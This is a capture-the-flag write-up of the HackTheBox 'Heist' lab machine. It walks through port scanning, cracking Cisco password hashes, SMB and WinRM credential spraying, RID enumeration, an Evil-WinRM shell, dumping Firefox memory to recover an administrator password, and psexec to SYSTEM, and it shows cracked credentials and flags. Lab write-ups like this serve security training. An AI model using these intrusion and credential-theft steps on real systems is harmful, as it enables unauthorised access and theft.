HTB_Heist
HTB_Heist

HackTheBox Heist Writeup is here to see how to solve the Heist (CTF), the machine is rated easy ( which i don’t believe).
CTFs are great learning platform, dont forget to make some notes every time you encounter something new.

I have as always again added machine ip in /etc/hosts on my linux machine as heist.htb .

Step 1 – if you have a host with some IP, nmap it.

Initial nmap scan, we notice 2 more ports when we scan for all the ports with -p-

                                                                                
┌──(abhinav㉿ETHICALHACKX)-[~/htb]
└─$ nmap heist.htb                           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 19:51 IST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds
                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb]
└─$ nmap -p- -T5 heist.htb  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 19:51 IST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.18s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 201.88 seconds

Nmap scan for more information using the above ports only.

                                                                                
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ sudo nmap -sV -sC -A -O -p80,135,445,5985,49669 -T5 heist.htb -oA heist.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 20:00 IST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m40s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-22T14:33:24
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   173.36 ms 10.10.14.1
2   173.48 ms heist.htb (10.10.10.149)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.43 seconds

Checking the page in browser takes us to login page

Notice the Login as Guest Functionality ? Lets click it

We can also see the attachment on the page, which has the text with some hashes

ersion 12.2
no service pad
--SNIP--
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!

ip ssh version 2
!--SNIP--

 transport input ssh

We see three password hashes, lets try to uncover them.
The first one can be decrypted using john

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ john hash --wordlist=~/htb/rockyou.txt --rules=Jumbo       

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 0.00% (ETA: 2022-02-18 03:36) 0g/s 55508p/s 55508c/s 55508C/s 033192..perlis
stealth1agent    (?)
1g 0:00:00:14 DONE (2021-07-22 22:34) 0.06752g/s 236700p/s 236700c/s 236700C/s stealthy001..ste88dup
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The other two hashes can be decrypted using a small tool ciscot7 , can be cloned from here.

                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ git clone https://github.com/theevilbit/ciscot7.git     
Cloning into 'ciscot7'...
remote: Enumerating objects: 19, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 15
Receiving objects: 100% (19/19), 6.75 KiB | 2.25 MiB/s, done.
Resolving deltas: 100% (5/5), done.
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ cd ciscot7 
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7]
└─$ ls
ciscot7.py  LICENSE.md  README.md
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7]
└─$ python ciscot7.py -p 0242114B0E143F015F5D1E161713  
Decrypted password: $uperP@ssword
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7]
└─$ python ciscot7.py -p 02375012182C1A1D751618034F36415408
Decrypted password: Q4)sJu\Y8qz*A3?d
               

So far we have 3 passwords and few possible(guess only) usernames.

stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d

usernames

rout3r
admin
hazard

crackmapexec can help us test these usernames and password using shares module.

The same cam also be done using metasploit.

                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ sudo msfdb run                                                                                                                                                                                                                        1 
[sudo] password for abhinav: 
msf6 > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------

msf6 > setg USER_FILE user.txt
USER_FILE => user.txt
msf6 > setg PASS_FILE password.txt
PASS_FILE => password.txt
msf6 > setg RHOSTS heist.htb
RHOSTS => heist.htb
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
  
   PASS_FILE          password.txt     no        File containing passwords, one per line
   RHOSTS             heist.htb        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_FILE          user.txt         no        File containing usernames, one per line
 

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.149:445      - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\hazard:stealth1agent'
[*] heist.htb:445         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > creds
Credentials
===========

host          origin        service        public  private        realm  private_type  JtR Format
----          ------        -------        ------  -------        -----  ------------  ----------
10.10.10.149  10.10.10.149  445/tcp (smb)  hazard  stealth1agent         Password      

msf6 auxiliary(scanner/smb/smb_login) > 

Finding more users with impacket. This can help with RID bruteforce and find more usernames on the machine .

                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[/usr/share/doc/python3-impacket/examples]
└─$ python3 lookupsid.py 'hazard:stealth1agent'@heist.htb                                                                                                                                                                                 1 
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

[*] Brute forcing SIDs at heist.htb
[*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
     

We get few more usernames

support
chase
jason

Lets again hit the smb scanner with the new information we have on users.

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------

   PASS_FILE          password.txt     no        File containing passwords, one per line
 
   RHOSTS             heist.htb        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
 
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
  
   USER_FILE          user.txt         no        File containing usernames, one per line
 

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.149:445      - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\hazard:stealth1agent'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\chase:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\chase:$uperP@ssword',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\chase:Q4)sJu\Y8qz*A3?d'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\jason:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\jason:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\jason:Q4)sJu\Y8qz*A3?d',
[*] heist.htb:445         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So we have a new username:password combo chase:Q4)sJu\Y8qz*A3?d and we had one more from before – hazard:stealth1agent .

Returning back to winrm and setting username as chase to retry, we discover we can login using chase user.

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/winrm/winrm_login 
msf6 auxiliary(scanner/winrm/winrm_login) > show options

Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE         password.txt     no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            heist.htb        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         user.txt         no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME chase
USERNAME => chase
msf6 auxiliary(scanner/winrm/winrm_login) > run

[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\chase:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\chase:$uperP@ssword (Incorrect: )
[+] 10.10.10.149:5985 - Login Successful: WORKSTATION\chase:Q4)sJu\Y8qz*A3?d
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\support:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\support:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\support:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:Q4)sJu\Y8qz*A3?d (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > 

We have use chase which can connect , so let’s do it via a script you can get here, it’s a ruby script so install dependencies using sudo gem install dependency-list space separated , and after that running ruby evil-winrm .rb -u chase -p 'Q4)sJu\Y8qz*A3?d ' -i heist.htb .

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ git clone https://github.com/Hackplayers/evil-winrm.git
Cloning into 'evil-winrm'...
--SNIP---
Receiving objects: 100% (971/971), 2.01 MiB | 5.91 MiB/s, done.
Resolving deltas: 100% (566/566), done.
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ cd evil-winrm 
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ ls
CHANGELOG.md  CODE_OF_CONDUCT.md  CONTRIBUTING.md  Dockerfile  evil-winrm.rb  Gemfile  Gemfile.lock  LICENSE  README.md  resources
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ cat Gemfile       
source 'https://rubygems.org'

gem 'winrm'
gem 'winrm-fs'
gem 'stringio'
gem 'logger'
gem 'fileutils'
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ sudo gem install winrm winrm-fs stringio logger fileutils                                                                                                                                                                             1 
[sudo] password for abhinav: 
Fetching nori-2.6.0.gem
Fetching gssapi-1.3.1.gem
Fetching logging-2.3.0.gem
Fetching winrm-2.3.6.gem
--SNIP---
13 gems installed
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb               

Evil-WinRM shell v3.0

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> 

As usual, we check Desktop for the user flag.

*Evil-WinRM* PS C:\Users\Chase> gci -recurse . | select fullname

FullName
--------
C:\Users\Chase\3D Objects
C:\Users\Chase\Contacts
C:\Users\Chase\Desktop
C:\Users\Chase\Documents
C:\Users\Chase\Downloads
C:\Users\Chase\Favorites
C:\Users\Chase\Links
C:\Users\Chase\Music
C:\Users\Chase\Pictures
C:\Users\Chase\Saved Games
C:\Users\Chase\Searches
C:\Users\Chase\Videos
C:\Users\Chase\Desktop\todo.txt
C:\Users\Chase\Desktop\user.txt
C:\Users\Chase\Downloads\VMware-tools-11.2.5-17337674-x86_64.exe
C:\Users\Chase\Favorites\Links
C:\Users\Chase\Favorites\Bing.url
C:\Users\Chase\Links\Desktop.lnk
C:\Users\Chase\Links\Downloads.lnk

*Evil-WinRM* PS C:\Users\Chase> cd desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> ls


    Directory: C:\Users\Chase\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt


*Evil-WinRM* PS C:\Users\Chase\desktop> type user.txt
a127daef77ab6d9d92008653295f59c4
*Evil-WinRM* PS C:\Users\Chase\desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase\desktop> 

Trying other things in different user directory or inetpub or other don’t result into anything useful since no write access.
However in program files directory firefox can be noticed and so we also have a look at running process, which shows couple of entries for firefox.

*Evil-WinRM* PS C:\Users\Chase> cd ../..
*Evil-WinRM* PS C:\> gci


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/21/2019   5:33 PM                inetpub
d-----        9/15/2018  12:49 PM                PerfLogs
d-r---        2/18/2021   4:17 PM                Program Files
d-----        4/22/2019   6:56 AM                Program Files (x86)
d-r---        4/22/2019   7:26 AM                Users
d-----        2/18/2021   4:06 PM                Windows



*Evil-WinRM* PS C:\> cd 'program files'
*Evil-WinRM* PS C:\program files> gci


    Directory: C:\program files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/21/2019   9:39 AM                Common Files
d-----        4/21/2019  11:00 AM                internet explorer
d-----        2/18/2021   4:21 PM                Mozilla Firefox
d-----        4/22/2019   6:47 AM                PHP
d-----        4/22/2019   6:46 AM                Reference Assemblies
d-----        4/22/2019   6:46 AM                runphp
d-----        2/18/2021   4:05 PM                VMware
d-r---        4/21/2019  11:00 AM                Windows Defender
d-----        4/21/2019  11:00 AM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:49 PM                Windows Mail
d-----        4/21/2019  11:00 AM                Windows Media Player
d-----        9/15/2018  12:49 PM                Windows Multimedia Platform
d-----        9/15/2018  12:58 PM                windows nt
d-----        4/21/2019  11:00 AM                Windows Photo Viewer
d-----        9/15/2018  12:49 PM                Windows Portable Devices
d-----        9/15/2018  12:49 PM                Windows Security
d-----        9/15/2018  12:49 PM                WindowsPowerShell


*Evil-WinRM* PS C:\program files> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    468      18     2264       5400               372   0 csrss
  ---SNIP---
   1077      73   172240     248556       6.70   6184   1 firefox
    347      20     9912      34732       0.22   6300   1 firefox
    401      35    40716     104456       1.09   6436   1 firefox
    378      28    25040      62648       1.09   6752   1 firefox
    355      25    16324      38932       0.11   6964   1 firefox
 ----SNIP
   1312      27    69108      86932       1.08    968   0 wsmprovhost


*Evil-WinRM* PS C:\program files> 

Let us dump the firefox process pid using Sysinternals from Microsoft .
Upload procdump64.exe to a writable directory ( maybe chase/desktop)

*Evil-WinRM* PS C:\program files> cd 'C:/users/chase/desktop'
*Evil-WinRM* PS C:\users\chase\desktop> upload /home/abhinav/htb/heist/SysinternalsSuite/procdump64.exe
Info: Uploading /home/abhinav/htb/heist/SysinternalsSuite/procdump64.exe to C:\users\chase\desktop\procdump64.exe

                                                             
Data: 535048 bytes of 535048 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\users\chase\desktop> gci


    Directory: C:\users\chase\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/29/2021   1:17 AM         401288 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt


*Evil-WinRM* PS C:\users\chase\desktop> 
*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -accepteula

Lets dump fireforx process one by one with ./processdump64.exe -m process_id_one_at_a_time
dont forget to accept eula by ./processdump64.exe -accepteula .

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6184

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:00] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012200.dmp
[01:22:01] Dump 1 writing: Estimated dump file size is 529 MB.
[01:22:02] Dump 1 complete: 529 MB written in 1.4 seconds
[01:22:02] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6300

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:20] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012220.dmp
[01:22:20] Dump 1 writing: Estimated dump file size is 293 MB.
[01:22:20] Dump 1 complete: 293 MB written in 0.4 seconds
[01:22:21] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6436

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:32] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012232.dmp
[01:22:32] Dump 1 writing: Estimated dump file size is 350 MB.
[01:22:33] Dump 1 complete: 350 MB written in 0.5 seconds
[01:22:33] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6752

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:41] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012241.dmp
[01:22:41] Dump 1 writing: Estimated dump file size is 310 MB.
[01:22:42] Dump 1 complete: 310 MB written in 0.4 seconds
[01:22:42] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6964

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:50] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012250.dmp
[01:22:50] Dump 1 writing: Estimated dump file size is 298 MB.
[01:22:51] Dump 1 complete: 298 MB written in 0.4 seconds
[01:22:51] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> 

Downloading these dumps to your local machine can take time depending on your network speed, but can be done with

*Evil-WinRM* PS C:\users\chase\desktop> gci


    Directory: C:\users\chase\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/29/2021   1:22 AM      541427283 firefox.exe_210729_012200.dmp
-a----        7/29/2021   1:22 AM      299695231 firefox.exe_210729_012220.dmp
-a----        7/29/2021   1:22 AM      358364796 firefox.exe_210729_012232.dmp
-a----        7/29/2021   1:22 AM      317007025 firefox.exe_210729_012241.dmp
-a----        7/29/2021   1:22 AM      304502485 firefox.exe_210729_012250.dmp
-a----        7/29/2021   1:17 AM         401288 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

Examining the strings in one of the dump files, for me one ending in 012220.dmp and searching only for password strings gives the administrator username and password which is admin@support.htb : 4dD!5}x/re8]FBuZ . Dont forget to add the username administrator and password to our list of user.txt and password.txt

heist admin login

We are able to do login from admin@support.htb but nothing more here even after that on web-page.

Let us again fire crackmapexec to do some validations of our discoveries ( administrator).

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ crackmapexec smb 10.10.10.149 -u user.txt -p password.txt                                                                                                                                                                             2 
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\administrator:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\administrator:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

and we have a valid combo – administrator:4dD!5}x/re8]FBuZ

Root Flag

Lets now use psexec to get in.

                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@heist.htb
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on heist.htb.....
[*] Found writable share ADMIN$
[*] Uploading file iajwQmKr.exe
[*] Opening SVCManager on heist.htb.....
[*] Creating service PMMu on heist.htb.....
[*] Starting service PMMu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:/users/administrator/desktop


c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 78E3-E62D

 Directory of c:\Users\Administrator\Desktop

02/18/2021  04:00 PM    <DIR>          .
02/18/2021  04:00 PM    <DIR>          ..
04/22/2019  09:05 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6,840,758,272 bytes free

c:\Users\Administrator\Desktop>type root.txt
50dfa3c6bfd20e2e0d071b073d766897
c:\Users\Administrator\Desktop>

We finally have both user and root flags, hope this box was a great learning.

What Do You Think on This ? Say Here